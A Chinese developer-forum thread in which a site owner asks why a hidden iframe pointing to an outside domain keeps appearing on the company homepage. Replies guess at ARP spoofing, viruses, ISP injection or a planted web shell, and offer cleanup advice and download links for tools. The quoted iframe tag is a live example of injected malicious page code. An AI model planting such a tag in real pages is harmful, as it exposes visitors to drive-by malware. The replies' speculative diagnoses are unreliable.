站点被黑,帮忙看看
公司网站首页打开后,在页面顶部总会有
<iframe   src= 'http://j.56c.us/o.htm '   height=0   width=50> </iframe>
这么一段
我检查过这个页面包括的js   和   css文件,都有没有出现过j.56c.us
请教下各位有什么好办法,谢谢

------解决方案--------------------
安全问题不清楚..
------解决方案--------------------
服务器有病毒

造成站点加载时被更改
------解决方案--------------------
这不是被黑,纯粹是病毒搞的.挺难杀的.

------解决方案--------------------
arp漏洞攻击
------解决方案--------------------
典型的ARP欺骗
------解决方案--------------------
典型的ARP欺骗
让服务器商查看解决，是局域网内一台服务器这样，其他的也这样，绑定网卡可以解决
------解决方案--------------------
服务器中毒了！
------解决方案--------------------
病毒
------解决方案--------------------
服务器 病毒?
或者楼主是 服务器 被 网络 运营商给 流氓了
现在 这样的 技术在电信提供商 已经很成熟了
对于访问的 可控网络的的内容 进行 实时修改
比如对你服务器 输出的 html添加 类似的脚本广告.
------解决方案--------------------
中毒了把？
------解决方案--------------------
哈
我机子也惨了
------解决方案--------------------
叫电信运营商查查。流氓死了
------解决方案--------------------
不懂
------解决方案--------------------
还没解决啊。。帮你顶。。。
------解决方案--------------------
不懂,帮顶一下
------解决方案--------------------
看看进别的网站有没有被添加。比如163什么的大站

如果有，那么就是IE的一个漏洞，4月发布了新补丁

如果没有就是服务器。。。节哀~
------解决方案--------------------
故障处理

1、中毒者：使用趋势科技ARP病毒专杀工具查杀病毒

下载后解压缩，运行包内TSC.exe文件，不要关让它一直运行完，最后查看report文档便知是否中毒。
http://www.wuzone.com/attachments/month_0704/z2007424161624.rar

2、被害者：使用AntiArp软件抵御ARP攻击

运行AntiArp。输入本网段的网关ip地址后，点击 "获取网关MAC地址 "，检查网关IP地址和MAC地址无误后，点击 "自动保护 "。若不知道网关IP地址，可通过以下操作获取：点击 "开始 "按钮-> 选择 "运行 "-> 输入 "cmd "点击 "确定 "-> 输入 "ipconfig "按回车， "Default Gateway "后的IP地址就是网关地址。AntiArp软件会在提示框内出现病毒主机的MAC地址。
http://www.wuzone.com/attachments/month_0704/u2007424161835.rar
------解决方案--------------------
是服务器问题还是你浏览器问题呢
------解决方案--------------------
这个病毒太无耻了
------解决方案--------------------
第一检查程序漏洞
第二修改权限。如果是ASP程序就修改FSO名称和CLASSID可以杜绝这个病毒
------解决方案--------------------
这叫ARP或中毒，简单是大言不惭。这样的攻击方法一般是通过后台或其他上传的模块，上个WebShell(ASP,PHP,JSP,ASP.NET等可对硬盘物理文件或系统权限操作的页面)，而然后修改站点页挂马。一般修改被调用和比较多的页面，比如Head.asp之类的。
解决最好的办法是修改程序漏洞，同时对服务器做好相应权限设置，一般是很难通过WS修改网站页面的。
如再有不明白可联系 Q：77273364
------解决方案--------------------
替换还是篡改！~
------解决方案--------------------
把那段代码直接删掉不行吗 ！！??